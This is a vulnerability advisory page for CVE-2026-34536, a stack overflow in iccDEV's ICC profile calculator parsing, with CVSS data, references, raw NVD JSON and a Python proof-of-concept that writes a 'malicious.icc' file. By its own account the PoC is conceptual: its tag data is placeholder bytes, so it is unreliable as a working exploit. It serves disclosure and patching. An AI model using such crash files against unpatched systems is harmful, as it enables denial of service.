Security Vulnerability Report
CVE-2026-34536 CVSS 6.2 MEDIUM

Published: 2026-03-31 22:16:21
Last Modified: 2026-04-20 13:51:12

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack overflow (SO) in SIccCalcOp::ArgsUsed(). The issue is observable under AddressSanitizer as a stack-overflow when iccApplyProfiles processes a malicious profile, with the crash occurring while computing argument usage during calculator underflow/overflow checks. This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Generate a malicious ICC profile header.
# This is a conceptual PoC. The actual trigger requires specific malformed
# calculator tags that cause SIccCalcOp::ArgsUsed() to recurse too deep.
def create_malformed_icc(filename):
    with open(filename, 'wb') as f:
        # ICC Profile Header (128 bytes)
        # Profile size (set to a small value, but tags will extend it)
        f.write(struct.pack('>I', 0))
        # Preferred CMM type (the PoC writes 'acsp' here as a placeholder)
        f.write(b'acsp')
        # Profile version 2.3.0
        f.write(struct.pack('>I', 0x2300000))
        # Profile/Device class (e.g., 'prtr' for printer)
        f.write(b'prtr')
        # Color space (e.g., 'RGB ')
        f.write(b'RGB ')
        # PCS (e.g., 'XYZ ')
        f.write(b'XYZ ')
        # Date/Time (12 bytes, dummy)
        f.write(b'\x00' * 12)
        # Magic signature 'acsp'
        f.write(b'acsp')
        # Platform signature (dummy)
        f.write(struct.pack('>I', 0))
        # Flags (dummy)
        f.write(struct.pack('>I', 0))
        # Manufacturer (dummy)
        f.write(struct.pack('>I', 0))
        # Model (dummy)
        f.write(struct.pack('>I', 0))
        # Attributes (8 bytes, dummy); the field is 64 bits wide, so the
        # header totals 128 bytes and tag_offset below stays correct
        f.write(struct.pack('>Q', 0))
        # Rendering Intent (dummy)
        f.write(struct.pack('>I', 0))
        # Illuminant (XYZ Number, dummy)
        f.write(struct.pack('>III', 0, 0, 0))
        # Creator (dummy)
        f.write(struct.pack('>I', 0))
        # Profile ID (16 bytes, dummy)
        f.write(b'\x00' * 16)
        # Reserved (28 bytes)
        f.write(b'\x00' * 28)
        # Tag table entry count (1 tag)
        f.write(struct.pack('>I', 1))
        # Tag Table Entry (starts at offset 128)
        # Tag signature: 'mluc' or similar, but we need a calculator tag (e.g., 'bfd ')
        # In a real exploit, this tag data would be crafted to cause the overflow.
        tag_sig = b'bfd '  # Basic Formula Type (example)
        tag_offset = 128 + 4 + 12  # Header + Tag Count + Tag Entry Size
        tag_size = 1000  # Arbitrary size
        # Write Tag Entry
        f.write(tag_sig)
        f.write(struct.pack('>I', tag_offset))
        f.write(struct.pack('>I', tag_size))
        # Write Tag Data (Malformed content)
        # This content would typically be a formula that triggers the overflow in ArgsUsed()
        f.write(b'A' * tag_size)

if __name__ == '__main__':
    create_malformed_icc('malicious.icc')
    print('Malformed ICC profile generated: malicious.icc')
    # To trigger the vulnerability, load this file using iccApplyProfiles in iccDEV < 2.3.1.6

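References

https://github.com/InternationalColorConsortium/iccDEV/issues/669 (Issue Tracking, Exploit)
https://github.com/InternationalColorConsortium/iccDEV/pull/684 (Issue Tracking, Patch)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-cr68-xp9x-8597 (Patch, Vendor Advisory)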

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34536", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.130", "lastModified": "2026-04-20T13:51:11.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack overflow (SO) in SIccCalcOp::ArgsUsed(). The issue is observable under AddressSanitizer as a stack-overflow when iccApplyProfiles processes a malicious profile, with the crash occurring while computing argument usage during calculator underflow/overflow checks. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de pila (SO) en SIccCalcOp::ArgsUsed(). El problema es observable bajo AddressSanitizer como un desbordamiento de pila cuando iccApplyProfiles procesa un perfil malicioso, con el fallo ocurriendo mientras se calcula el uso de argumentos durante las comprobaciones de subdesbordamiento/desbordamiento de la calculadora. 
Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/669", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/684", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-cr68-xp9x-8597", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}